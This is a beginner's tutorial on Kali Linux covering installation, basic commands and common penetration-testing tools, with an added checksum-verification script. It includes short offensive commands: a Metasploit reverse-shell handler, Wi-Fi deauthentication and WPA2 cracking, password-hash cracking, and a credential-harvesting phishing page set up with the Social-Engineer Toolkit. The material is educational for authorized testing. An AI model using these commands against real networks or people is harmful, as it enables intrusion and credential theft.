Kali Linux Tutorial – Complete Guide for Beginners
1. Introduction to Kali Linux
Kali Linux is a Debian-based Linux distribution designed for penetration testing, ethical hacking, and cybersecurity. It comes pre-installed with 600+ security tools for vulnerability analysis, forensics, and network security.
✅ Who Should Use Kali Linux?
✔ Ethical Hackers
✔ Cybersecurity Professionals
✔ IT Administrators
✔ Bug Bounty Hunters
2. Installing Kali Linux
Option 1: Bare Metal Installation (Direct Install)
Download Kali Linux from kali.org
Create a Bootable USB using:
Windows: Rufus
Linux/macOS: dd command
sudo dd if=kali-linux.iso of=/dev/sdX bs=4M status=progress
Boot from USB and follow the installer.
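Added example (not from the original tutorial or the Kali project): before running dd, check the download against its published SHA-256 list and confirm the target is a removable whole disk. It assumes Linux with GNU coreutils and that SHA256SUMS is the checksum file downloaded alongside the ISO; the function names are illustrative.

```bash
#!/usr/bin/env bash
# Pre-flight checks before writing an installer image with dd (added example).
# Assumes Linux with GNU coreutils; function names are illustrative.

# verify_iso ISO SUMS_FILE
# Succeeds only if SUMS_FILE lists a SHA-256 for the ISO's file name and it
# equals the digest computed locally. Returns 2 if unlisted, 1 on mismatch.
verify_iso() {
    local iso="$1" sums="$2" name expected actual
    name=$(basename -- "$iso")
    # Lines look like "<hex digest>  <file name>" (name may carry a leading *).
    expected=$(awk -v n="$name" \
        '{ f = $2; sub(/^\*/, "", f) } f == n { print $1; exit }' "$sums")
    [ -n "$expected" ] || { echo "no checksum listed for $name" >&2; return 2; }
    actual=$(sha256sum -- "$iso" | awk '{ print $1 }')
    [ "$expected" = "$actual" ] || { echo "checksum MISMATCH: $name" >&2; return 1; }
    echo "checksum OK: $name"
}

# is_removable_disk DEVICE [SYSFS_ROOT]
# Succeeds only if DEVICE (e.g. /dev/sdX) is a whole disk the kernel flags as
# removable. Partitions return 2. USB hard disks often report 0 and are
# rejected; confirm those by hand with lsblk.
is_removable_disk() {
    local dev sys="${2:-/sys/block}"
    dev=$(basename -- "$1")
    [ -r "$sys/$dev/removable" ] || { echo "$1: not a whole disk" >&2; return 2; }
    [ "$(cat "$sys/$dev/removable")" = "1" ] || { echo "$1: not removable" >&2; return 1; }
}

# safe_write ISO SUMS_FILE DEVICE
# Runs both checks, then the dd command from the tutorial (conv=fsync added so
# dd returns only after the data has been flushed to the device).
safe_write() {
    verify_iso "$1" "$2" && is_removable_disk "$3" || return 1
    sudo dd if="$1" of="$3" bs=4M status=progress conv=fsync
}

# Usage: safe_write kali-linux.iso SHA256SUMS /dev/sdX
```

A matching checksum only shows that the ISO matches the list; verifying the list's GPG signature is what ties it to Kali's signing key.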
Option 2: Virtual Machine (Recommended for Beginners)
VMware/VirtualBox:
Download Kali Linux VM Image from Offensive Security
Import into VMware Workstation or VirtualBox.
Option 3: WSL (Windows Subsystem for Linux)
Run Kali Linux inside Windows:
wsl --install -d kali-linux
3. Kali Linux Basics
Default Credentials
Username: kali
Password: kali
Update & Upgrade
sudo apt update && sudo apt full-upgrade -y
Essential Commands
| Command | Description |
|---|---|
| sudo su | Switch to root |
| apt install <package> | Install software |
| ifconfig / ip a | Check network interfaces |
| nmap | Network scanning |
| msfconsole | Launch Metasploit |
4. Penetration Testing Tools in Kali Linux
A. Information Gathering
| Tool | Purpose |
|---|---|
| Nmap | Network scanning & port discovery |
| Maltego | OSINT (Open-Source Intelligence) |
| Recon-ng | Web reconnaissance |
Example: Nmap Scan
nmap -sV 192.168.1.1 # Scan a target IP
B. Vulnerability Analysis
| Tool | Purpose |
|---|---|
| Nikto | Web server scanner |
| OpenVAS | Vulnerability assessment |
| Burp Suite | Web app security testing |
Example: Nikto Scan
nikto -h http://example.com
C. Exploitation Tools
| Tool | Purpose |
|---|---|
| Metasploit Framework | Exploit development |
| SQLmap | SQL injection attacks |
| Hydra | Password cracking |
Example: Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
D. Password Attacks
| Tool | Purpose |
|---|---|
| John the Ripper | Password cracking |
| Hashcat | GPU-accelerated cracking |
| Crunch | Wordlist generator |
Example: Crack a Hash with John
john --format=md5 hashes.txt
E. Wireless Attacks
| Tool | Purpose |
|---|---|
| Aircrack-ng | Wi-Fi cracking |
| Wifite | Automated Wi-Fi attacks |
| Kismet | Wireless detection |
Example: WPA2 Cracking
airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng --deauth 10 -a <AP-MAC> wlan0mon
aircrack-ng -w rockyou.txt capture.cap
5. Ethical Hacking Example: Phishing Attack (Demo)
Step 1: Set Up a Fake Login Page
sudo apt install setoolkit
sudo setoolkit
Select Social-Engineering Attacks
Choose Website Attack Vectors
Pick Credential Harvester
Step 2: Send Phishing Email (Optional)
Use GoPhish or SocialFish.
Step 3: Monitor Captured Credentials
Check logs in
/var/www/html/
⚠ Note: Only use this for legal, authorized testing!
6. Kali Linux Customization
Change Default Password
passwd
Install Additional Tools
sudo apt install -y metasploit-framework burpsuite wireshark
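Enable SSH for Remote Access
Change the default password first (see Change Default Password above); with kali/kali still set, anyone who can reach the SSH port can log in.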
sudo systemctl enable ssh --now
7. Kali Linux Best Practices
✔ Use a VPN for anonymity (e.g., openvpn).
✔ Never use Kali as a daily OS (use a VM instead).
✔ Stay updated (run sudo apt update && sudo apt full-upgrade -y weekly).
✔ Follow legal guidelines (only hack authorized systems).
8. Next Steps
🚀 Try CTF Challenges (HackTheBox, TryHackMe)
🚀 Learn Bash & Python Scripting for automation
🚀 Explore Advanced Exploits (Zero-Days, Buffer Overflows)